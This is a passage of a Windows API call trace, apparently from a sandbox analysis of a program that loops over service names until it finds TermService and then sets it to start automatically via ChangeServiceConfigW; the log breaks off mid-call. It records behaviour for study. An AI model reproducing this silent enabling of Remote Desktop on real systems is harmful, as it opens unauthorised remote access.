flProtect=0x4) returned 0x3790000 [0317.739] lstrlenW (lpString="nsi") returned 3 [0317.739] lstrcpyW (in: lpString1=0x3790000, lpString2="nsi" | out: lpString1="nsi") returned="nsi" [0317.739] lstrcmpW (lpString1="nsi", lpString2="TermService") returned -1 [0317.739] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.740] lstrlenW (lpString="ose") returned 3 [0317.740] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.740] lstrlenW (lpString="ose") returned 3 [0317.740] lstrcpyW (in: lpString1=0x3790000, lpString2="ose" | out: lpString1="ose") returned="ose" [0317.740] lstrcmpW (lpString1="ose", lpString2="TermService") returned -1 [0317.740] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.741] lstrlenW (lpString="p2pimsvc") returned 8 [0317.741] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.743] lstrlenW (lpString="p2pimsvc") returned 8 [0317.743] lstrcpyW (in: lpString1=0x3790000, lpString2="p2pimsvc" | out: lpString1="p2pimsvc") returned="p2pimsvc" [0317.743] lstrcmpW (lpString1="p2pimsvc", lpString2="TermService") returned -1 [0317.743] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.744] lstrlenW (lpString="p2psvc") returned 6 [0317.744] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.744] lstrlenW (lpString="p2psvc") returned 6 [0317.744] lstrcpyW (in: lpString1=0x3790000, lpString2="p2psvc" | out: lpString1="p2psvc") returned="p2psvc" [0317.744] lstrcmpW (lpString1="p2psvc", lpString2="TermService") returned -1 [0317.744] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.745] lstrlenW (lpString="PcaSvc") returned 6 [0317.745] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.745] lstrlenW (lpString="PcaSvc") returned 6 [0317.745] lstrcpyW (in: lpString1=0x3790000, lpString2="PcaSvc" | out: lpString1="PcaSvc") returned="PcaSvc" [0317.745] lstrcmpW (lpString1="PcaSvc", lpString2="TermService") returned -1 [0317.745] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.746] lstrlenW (lpString="PeerDistSvc") returned 11 [0317.746] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.746] lstrlenW (lpString="PeerDistSvc") returned 11 [0317.747] lstrcpyW (in: lpString1=0x3790000, lpString2="PeerDistSvc" | out: lpString1="PeerDistSvc") returned="PeerDistSvc" [0317.747] lstrcmpW (lpString1="PeerDistSvc", lpString2="TermService") returned -1 [0317.747] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.747] lstrlenW (lpString="PerfHost") returned 8 [0317.747] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.748] lstrlenW (lpString="PerfHost") returned 8 [0317.748] lstrcpyW (in: lpString1=0x3790000, lpString2="PerfHost" | out: lpString1="PerfHost") returned="PerfHost" [0317.748] lstrcmpW (lpString1="PerfHost", lpString2="TermService") returned -1 [0317.748] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.748] lstrlenW (lpString="PhoneSvc") returned 8 [0317.749] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.749] lstrlenW (lpString="PhoneSvc") returned 8 [0317.749] lstrcpyW (in: lpString1=0x3790000, lpString2="PhoneSvc" | out: lpString1="PhoneSvc") returned="PhoneSvc" [0317.749] lstrcmpW (lpString1="PhoneSvc", lpString2="TermService") returned -1 [0317.749] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.750] lstrlenW (lpString="pla") returned 3 [0317.750] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.750] lstrlenW (lpString="pla") returned 3 [0317.750] lstrcpyW (in: lpString1=0x3790000, lpString2="pla" | out: lpString1="pla") returned="pla" [0317.750] lstrcmpW (lpString1="pla", lpString2="TermService") returned -1 [0317.750] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.751] lstrlenW (lpString="PlugPlay") returned 8 [0317.751] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.751] lstrlenW (lpString="PlugPlay") returned 8 [0317.751] lstrcpyW (in: lpString1=0x3790000, lpString2="PlugPlay" | out: lpString1="PlugPlay") returned="PlugPlay" [0317.751] lstrcmpW (lpString1="PlugPlay", lpString2="TermService") returned -1 [0317.751] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.752] lstrlenW (lpString="PNRPAutoReg") returned 11 [0317.752] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.752] lstrlenW (lpString="PNRPAutoReg") returned 11 [0317.753] lstrcpyW (in: lpString1=0x3790000, lpString2="PNRPAutoReg" | out: lpString1="PNRPAutoReg") returned="PNRPAutoReg" [0317.753] lstrcmpW (lpString1="PNRPAutoReg", lpString2="TermService") returned -1 [0317.753] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.753] lstrlenW (lpString="PNRPsvc") returned 7 [0317.753] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.754] lstrlenW (lpString="PNRPsvc") returned 7 [0317.754] lstrcpyW (in: lpString1=0x3790000, lpString2="PNRPsvc" | out: lpString1="PNRPsvc") returned="PNRPsvc" [0317.754] lstrcmpW (lpString1="PNRPsvc", lpString2="TermService") returned -1 [0317.754] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.754] lstrlenW (lpString="PolicyAgent") returned 11 [0317.754] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.755] lstrlenW (lpString="PolicyAgent") returned 11 [0317.755] lstrcpyW (in: lpString1=0x3790000, lpString2="PolicyAgent" | out: lpString1="PolicyAgent") returned="PolicyAgent" [0317.755] lstrcmpW (lpString1="PolicyAgent", lpString2="TermService") returned -1 [0317.755] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.755] lstrlenW (lpString="Power") returned 5 [0317.900] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.901] lstrlenW (lpString="Power") returned 5 [0317.901] lstrcpyW (in: lpString1=0x3790000, lpString2="Power" | out: lpString1="Power") returned="Power" [0317.901] lstrcmpW (lpString1="Power", lpString2="TermService") returned -1 [0317.901] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.902] lstrlenW (lpString="PrintNotify") returned 11 [0317.902] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.902] lstrlenW (lpString="PrintNotify") returned 11 [0317.902] lstrcpyW (in: lpString1=0x3790000, lpString2="PrintNotify" | out: lpString1="PrintNotify") returned="PrintNotify" [0317.902] lstrcmpW (lpString1="PrintNotify", lpString2="TermService") returned -1 [0317.902] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.903] lstrlenW (lpString="ProfSvc") returned 7 [0317.903] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.903] lstrlenW (lpString="ProfSvc") returned 7 [0317.903] lstrcpyW (in: lpString1=0x3790000, lpString2="ProfSvc" | out: lpString1="ProfSvc") returned="ProfSvc" [0317.904] lstrcmpW (lpString1="ProfSvc", lpString2="TermService") returned -1 [0317.904] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.904] lstrlenW (lpString="QWAVE") returned 5 [0317.904] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.905] lstrlenW (lpString="QWAVE") returned 5 [0317.905] lstrcpyW (in: lpString1=0x3790000, lpString2="QWAVE" | out: lpString1="QWAVE") returned="QWAVE" [0317.905] lstrcmpW (lpString1="QWAVE", lpString2="TermService") returned -1 [0317.905] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.906] lstrlenW (lpString="RasAuto") returned 7 [0317.906] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.906] lstrlenW (lpString="RasAuto") returned 7 [0317.906] lstrcpyW (in: lpString1=0x3790000, lpString2="RasAuto" | out: lpString1="RasAuto") returned="RasAuto" [0317.906] lstrcmpW (lpString1="RasAuto", lpString2="TermService") returned -1 [0317.907] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.907] lstrlenW (lpString="RasMan") returned 6 [0317.907] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.908] lstrlenW (lpString="RasMan") returned 6 [0317.908] lstrcpyW (in: lpString1=0x3790000, lpString2="RasMan" | out: lpString1="RasMan") returned="RasMan" [0317.908] lstrcmpW (lpString1="RasMan", lpString2="TermService") returned -1 [0317.908] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.909] lstrlenW (lpString="RemoteAccess") returned 12 [0317.909] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.909] lstrlenW (lpString="RemoteAccess") returned 12 [0317.909] lstrcpyW (in: lpString1=0x3790000, lpString2="RemoteAccess" | out: lpString1="RemoteAccess") returned="RemoteAccess" [0317.909] lstrcmpW (lpString1="RemoteAccess", lpString2="TermService") returned -1 [0317.909] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.910] lstrlenW (lpString="RemoteRegistry") returned 14 [0317.910] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.911] lstrlenW (lpString="RemoteRegistry") returned 14 [0317.911] lstrcpyW (in: lpString1=0x3790000, lpString2="RemoteRegistry" | out: lpString1="RemoteRegistry") returned="RemoteRegistry" [0317.911] lstrcmpW (lpString1="RemoteRegistry", lpString2="TermService") returned -1 [0317.911] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.911] lstrlenW (lpString="RetailDemo") returned 10 [0317.911] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.913] lstrlenW (lpString="RetailDemo") returned 10 [0317.913] lstrcpyW (in: lpString1=0x3790000, lpString2="RetailDemo" | out: lpString1="RetailDemo") returned="RetailDemo" [0317.913] lstrcmpW (lpString1="RetailDemo", lpString2="TermService") returned -1 [0317.913] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.916] lstrlenW (lpString="RpcEptMapper") returned 12 [0317.916] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.916] lstrlenW (lpString="RpcEptMapper") returned 12 [0317.916] lstrcpyW (in: lpString1=0x3790000, lpString2="RpcEptMapper" | out: lpString1="RpcEptMapper") returned="RpcEptMapper" [0317.916] lstrcmpW (lpString1="RpcEptMapper", lpString2="TermService") returned -1 [0317.916] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.917] lstrlenW (lpString="RpcLocator") returned 10 [0317.917] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.918] lstrlenW (lpString="RpcLocator") returned 10 [0317.918] lstrcpyW (in: lpString1=0x3790000, lpString2="RpcLocator" | out: lpString1="RpcLocator") returned="RpcLocator" [0317.918] lstrcmpW (lpString1="RpcLocator", lpString2="TermService") returned -1 [0317.918] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.919] lstrlenW (lpString="RpcSs") returned 5 [0317.919] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.919] lstrlenW (lpString="RpcSs") returned 5 [0317.919] lstrcpyW (in: lpString1=0x3790000, lpString2="RpcSs" | out: lpString1="RpcSs") returned="RpcSs" [0317.919] lstrcmpW (lpString1="RpcSs", lpString2="TermService") returned -1 [0317.919] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.920] lstrlenW (lpString="SamSs") returned 5 [0317.920] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.921] lstrlenW (lpString="SamSs") returned 5 [0317.921] lstrcpyW (in: lpString1=0x3790000, lpString2="SamSs" | out: lpString1="SamSs") returned="SamSs" [0317.921] lstrcmpW (lpString1="SamSs", lpString2="TermService") returned -1 [0317.921] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.921] lstrlenW (lpString="SCardSvr") returned 8 [0317.921] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.922] lstrlenW (lpString="SCardSvr") returned 8 [0317.922] lstrcpyW (in: lpString1=0x3790000, lpString2="SCardSvr" | out: lpString1="SCardSvr") returned="SCardSvr" [0317.922] lstrcmpW (lpString1="SCardSvr", lpString2="TermService") returned -1 [0317.922] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.923] lstrlenW (lpString="ScDeviceEnum") returned 12 [0317.923] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.923] lstrlenW (lpString="ScDeviceEnum") returned 12 [0317.923] lstrcpyW (in: lpString1=0x3790000, lpString2="ScDeviceEnum" | out: lpString1="ScDeviceEnum") returned="ScDeviceEnum" [0317.923] lstrcmpW (lpString1="ScDeviceEnum", lpString2="TermService") returned -1 [0317.923] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.924] lstrlenW (lpString="Schedule") returned 8 [0317.924] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.924] lstrlenW (lpString="Schedule") returned 8 [0317.924] lstrcpyW (in: lpString1=0x3790000, lpString2="Schedule" | out: lpString1="Schedule") returned="Schedule" [0317.924] lstrcmpW (lpString1="Schedule", lpString2="TermService") returned -1 [0317.925] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.925] lstrlenW (lpString="SCPolicySvc") returned 11 [0317.925] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.926] lstrlenW (lpString="SCPolicySvc") returned 11 [0317.926] lstrcpyW (in: lpString1=0x3790000, lpString2="SCPolicySvc" | out: lpString1="SCPolicySvc") returned="SCPolicySvc" [0317.926] lstrcmpW (lpString1="SCPolicySvc", lpString2="TermService") returned -1 [0317.926] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.926] lstrlenW (lpString="SDRSVC") returned 6 [0317.926] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.927] lstrlenW (lpString="SDRSVC") returned 6 [0317.927] lstrcpyW (in: lpString1=0x3790000, lpString2="SDRSVC" | out: lpString1="SDRSVC") returned="SDRSVC" [0317.927] lstrcmpW (lpString1="SDRSVC", lpString2="TermService") returned -1 [0317.927] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.928] lstrlenW (lpString="seclogon") returned 8 [0317.930] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.930] lstrlenW (lpString="seclogon") returned 8 [0317.930] lstrcpyW (in: lpString1=0x3790000, lpString2="seclogon" | out: lpString1="seclogon") returned="seclogon" [0317.930] lstrcmpW (lpString1="seclogon", lpString2="TermService") returned -1 [0317.930] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.931] lstrlenW (lpString="SENS") returned 4 [0317.931] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.932] lstrlenW (lpString="SENS") returned 4 [0317.932] lstrcpyW (in: lpString1=0x3790000, lpString2="SENS" | out: lpString1="SENS") returned="SENS" [0317.932] lstrcmpW (lpString1="SENS", lpString2="TermService") returned -1 [0317.932] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.932] lstrlenW (lpString="SensorDataService") returned 17 [0317.933] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.933] lstrlenW (lpString="SensorDataService") returned 17 [0317.933] lstrcpyW (in: lpString1=0x3790000, lpString2="SensorDataService" | out: lpString1="SensorDataService") returned="SensorDataService" [0317.933] lstrcmpW (lpString1="SensorDataService", lpString2="TermService") returned -1 [0317.933] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.934] lstrlenW (lpString="SensorService") returned 13 [0317.934] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.934] lstrlenW (lpString="SensorService") returned 13 [0317.934] lstrcpyW (in: lpString1=0x3790000, lpString2="SensorService" | out: lpString1="SensorService") returned="SensorService" [0317.934] lstrcmpW (lpString1="SensorService", lpString2="TermService") returned -1 [0317.934] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.935] lstrlenW (lpString="SensrSvc") returned 8 [0317.935] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.936] lstrlenW (lpString="SensrSvc") returned 8 [0317.936] lstrcpyW (in: lpString1=0x3790000, lpString2="SensrSvc" | out: lpString1="SensrSvc") returned="SensrSvc" [0317.936] lstrcmpW (lpString1="SensrSvc", lpString2="TermService") returned -1 [0317.936] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.936] lstrlenW (lpString="SessionEnv") returned 10 [0317.936] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.937] lstrlenW (lpString="SessionEnv") returned 10 [0317.937] lstrcpyW (in: lpString1=0x3790000, lpString2="SessionEnv" | out: lpString1="SessionEnv") returned="SessionEnv" [0317.937] lstrcmpW (lpString1="SessionEnv", lpString2="TermService") returned -1 [0317.937] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.938] lstrlenW (lpString="SharedAccess") returned 12 [0317.938] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.938] lstrcpyW (in: lpString1=0x3790000, lpString2="SharedAccess" | out: lpString1="SharedAccess") returned="SharedAccess" [0317.938] lstrcmpW (lpString1="SharedAccess", lpString2="TermService") returned -1 [0317.938] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.939] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.939] lstrcpyW (in: lpString1=0x3790000, lpString2="ShellHWDetection" | out: lpString1="ShellHWDetection") returned="ShellHWDetection" [0317.940] lstrcmpW (lpString1="ShellHWDetection", lpString2="TermService") returned -1 [0317.940] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.940] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.941] lstrcpyW (in: lpString1=0x3790000, lpString2="smphost" | out: lpString1="smphost") returned="smphost" [0317.941] lstrcmpW (lpString1="smphost", lpString2="TermService") returned -1 [0317.941] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.942] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.942] lstrcpyW (in: lpString1=0x3790000, lpString2="SmsRouter" | out: lpString1="SmsRouter") returned="SmsRouter" [0317.942] lstrcmpW (lpString1="SmsRouter", lpString2="TermService") returned -1 [0317.942] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0318.011] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0318.049] lstrcpyW (in: lpString1=0x3790000, lpString2="SNMPTRAP" | out: lpString1="SNMPTRAP") returned="SNMPTRAP" [0318.049] lstrcmpW (lpString1="SNMPTRAP", lpString2="TermService") returned -1 [0318.049] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0318.051] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0318.051] lstrcpyW (in: lpString1=0x3790000, lpString2="Spooler" | out: lpString1="Spooler") returned="Spooler" [0318.052] lstrcmpW (lpString1="Spooler", lpString2="TermService") returned -1 [0318.052] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0318.052] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0318.053] lstrcpyW (in: lpString1=0x3790000, lpString2="sppsvc" | out: lpString1="sppsvc") returned="sppsvc" [0318.053] lstrcmpW (lpString1="sppsvc", lpString2="TermService") returned -1 [0318.053] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0318.054] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0318.054] lstrcpyW (in: lpString1=0x3790000, lpString2="SSDPSRV" | out: lpString1="SSDPSRV") returned="SSDPSRV" [0318.054] lstrcmpW (lpString1="SSDPSRV", lpString2="TermService") returned -1 [0318.054] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0318.055] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0318.056] lstrcpyW (in: lpString1=0x3790000, lpString2="SstpSvc" | out: lpString1="SstpSvc") returned="SstpSvc" [0318.056] lstrcmpW (lpString1="SstpSvc", lpString2="TermService") returned -1 [0318.056] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0318.056] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0318.057] lstrcpyW (in: lpString1=0x3790000, lpString2="StateRepository" | out: lpString1="StateRepository") returned="StateRepository" [0318.057] lstrcmpW (lpString1="StateRepository", lpString2="TermService") returned -1 [0318.057] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0318.058] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0318.058] lstrcpyW (in: lpString1=0x3790000, lpString2="stisvc" | out: lpString1="stisvc") returned="stisvc" [0318.058] lstrcmpW (lpString1="stisvc", lpString2="TermService") returned -1 [0318.058] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0318.059] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0318.059] lstrcpyW (in: lpString1=0x3790000, lpString2="StorSvc" | out: lpString1="StorSvc") returned="StorSvc" [0318.059] lstrcmpW (lpString1="StorSvc", lpString2="TermService") returned -1 [0318.060] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0318.061] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0318.061] lstrcpyW (in: lpString1=0x3790000, lpString2="svsvc" | out: lpString1="svsvc") returned="svsvc" [0318.061] lstrcmpW (lpString1="svsvc", lpString2="TermService") returned -1 [0318.061] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0318.062] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0318.063] lstrcpyW (in: lpString1=0x3790000, lpString2="swprv" | out: lpString1="swprv") returned="swprv" [0318.063] lstrcmpW (lpString1="swprv", lpString2="TermService") returned -1 [0318.063] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0318.064] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0318.064] lstrcpyW (in: lpString1=0x3790000, lpString2="SysMain" | out: lpString1="SysMain") returned="SysMain" [0318.064] lstrcmpW (lpString1="SysMain", lpString2="TermService") returned -1 [0318.064] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0318.065] VirtualAlloc (lpAddress=0x0, dwSize=0x26, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0318.065] lstrcpyW (in: lpString1=0x3790000, lpString2="SystemEventsBroker" | out: lpString1="SystemEventsBroker") returned="SystemEventsBroker" [0318.065] lstrcmpW (lpString1="SystemEventsBroker", lpString2="TermService") returned -1 [0318.065] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0318.066] VirtualAlloc (lpAddress=0x0, dwSize=0x26, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0318.067] lstrcpyW (in: lpString1=0x3790000, lpString2="TabletInputService" | out: lpString1="TabletInputService") returned="TabletInputService" [0318.067] lstrcmpW (lpString1="TabletInputService", lpString2="TermService") returned -1 [0318.067] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0318.067] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0318.068] lstrcpyW (in: lpString1=0x3790000, lpString2="TapiSrv" | out: lpString1="TapiSrv") returned="TapiSrv" [0318.068] lstrcmpW (lpString1="TapiSrv", lpString2="TermService") returned -1 [0318.068] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0318.071] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0318.071] lstrcpyW (in: lpString1=0x3790000, lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0318.071] lstrcmpW (lpString1="TermService", lpString2="TermService") returned 0 [0318.072] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x4890000 [0318.072] lstrcpyW (in: lpString1=0x4890000, lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0318.072] lstrlenW (lpString="TermService") returned 11 [0318.072] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x49a0000 [0318.073] lstrcpyW (in: lpString1=0x49a0000, lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0318.073] VirtualFree (lpAddress=0x4890000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0318.073] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0318.074] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName="ServicesActive", dwDesiredAccess=0x1) returned 0x6ad440 [0318.075] OpenServiceW (hSCManager=0x6ad440, lpServiceName="TermService", dwDesiredAccess=0x2) returned 0x6ad3a0 [0318.077] ChangeServiceConfigW (in: hService=0x6ad3a0, dwServiceType=0xffffffff, dwStartType=0x2, dwErrorControl=0xffffffff, lpBinaryPathName=0x0, lpLoadOrderGroup=0x0, lpdwTagId=0x0, lpDependencies=0x0, lpServiceStartName=0x0, lpPassword=0x0, lpDisplayName=0x0 | out: lpdwTagId=0x0) returned 1 [0318.078] CloseServiceHandle (hSCObject=0x6ad440) returned 1 [0318.078] CloseServiceHandle (hSCObject=0x6ad3a0) returned 1 [0318.079] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName="ServicesActive", dwDesiredAccess=0x1) returned 